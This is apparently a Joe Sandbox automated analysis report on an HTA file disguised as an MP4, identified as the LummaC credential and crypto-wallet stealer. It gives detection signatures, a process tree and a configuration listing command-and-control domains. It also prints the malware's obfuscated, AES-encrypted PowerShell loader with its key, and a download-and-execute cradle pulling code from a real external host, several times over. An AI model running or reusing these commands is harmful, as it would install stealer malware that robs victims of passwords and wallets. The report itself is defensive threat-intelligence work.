Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
singl6.mp4.hta

Overview

General Information

Sample name:singl6.mp4.hta
Analysis ID:1580268
MD5:543530c3b4038086637accf9d95397d6
SHA1:617115dda0f8553d7dd5cee8d0dc2ddec461c59c
SHA256:d070fad55be0d3269dbebb1de70652d82d48f0ad849f960d27d3e71018eb208c
Tags:EmmenhtalFakeCaptchaFakeMP4htauser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 3384 cmdline: mshta.exe "C:\Users\user\Desktop\singl6.mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 1056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1047B4CA5F5C3136955E90288D0CF771D4EDB3C9D787D81A22FA1D19D50DBC83BC87F1DCA44B36AD85C9385793AFD75CBEBC74C6D267B19EA7B471F3AA348B616B1DBAA4A77832B7A57A91B94748F0F93B2D08F4BC95283A1D6EF07728C7091AF8F56E69DE9EA56CA801CD0A7E62F5CDFAE51540ACFCB025D5E940A9075C8DA17758CDC6A94DC6B6D01EB23E488BA9A1371F56D19500FE2B8FB10BA9B54801012917F04D36326F74A108C2D0B9AD4FB51DA2F8BA2777F37564F5B6B6E926E7121E3462FF03AAE5966558C3283C1548AC5074916DB8A685025AD4BB17E389AAE7C4C89FE3D49A5B7CBB890755B7CBC935D1185DE2AFF91099EC236AF765EB3039E9561D484E095F1874255D784C682A4B088C008559D9426482954EA469C7570756');$BIAG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((cDnCn('4C50475A727A72534D6D4F70764E7061')),[byte[]]::new(16)).TransformFinalBlock($Lhmk,0,$Lhmk.Length)); & $BIAG.Substring(0,3) $BIAG.Substring(129) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3184 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6648 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["crosshuaht.lat", "energyaffai.lat", "discokeyus.lat", "sustainskelet.lat", "rapeflowwj.lat", "grannyejh.lat", "surmisehotte.click", "necklacebudi.lat", "aspecteirs.lat"], "Build id": "yJEcaG--singl6"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: powershell.exe PID: 1056JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 1056INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x4d71d:$b1: ::WriteAllBytes(
        • 0x1238e8:$b1: ::WriteAllBytes(
        • 0x1241ab:$b1: ::WriteAllBytes(
        • 0x34a78:$s1: -join
        • 0x3e330:$s1: -join
        • 0x4d154:$s1: -join
        • 0x4d7d0:$s1: -join
        • 0x4dbfa:$s1: -join
        • 0x4e951:$s1: -join
        • 0x88414:$s1: -join
        • 0x89bd0:$s1: -join
        • 0x8aaa1:$s1: -join
        • 0x8dbf5:$s1: -join
        • 0x8eab4:$s1: -join
        • 0xaa25c:$s1: -join
        • 0xb7331:$s1: -join
        • 0xba703:$s1: -join
        • 0xbadb5:$s1: -join
        • 0xbc8a6:$s1: -join
        • 0xbeaac:$s1: -join
        • 0xbf2d3:$s1: -join
        Process Memory Space: powershell.exe PID: 3184JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: powershell.exe PID: 3184INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xc96ee:$b2: ::FromBase64String(
          • 0x7eea22:$b2: ::FromBase64String(
          • 0xc94f7:$s1: -join
          • 0x1aa72b:$s1: -join
          • 0x6ccfd7:$s1: -join
          • 0x6ce163:$s1: -join
          • 0x76b0f2:$s1: -join
          • 0x7781c7:$s1: -join
          • 0x77b599:$s1: -join
          • 0x77bc4b:$s1: -join
          • 0x77d73c:$s1: -join
          • 0x77f942:$s1: -join
          • 0x780169:$s1: -join
          • 0x7809d9:$s1: -join
          • 0x781114:$s1: -join
          • 0x781146:$s1: -join
          • 0x78118e:$s1: -join
          • 0x7811ad:$s1: -join
          • 0x7819fd:$s1: -join
          • 0x781b79:$s1: -join
          • 0x781bf1:$s1: -join
          Process Memory Space: powershell.exe PID: 6648JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 2 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi32_1056.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_3184.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: PowerShell Download and Execution Cradles
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272
                Sigma detected: Suspicious MSHTA Child Process
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1
                Sigma detected: Suspicious PowerShell Parameter Substring
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1
                Sigma detected: PowerShell Download Pattern
                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 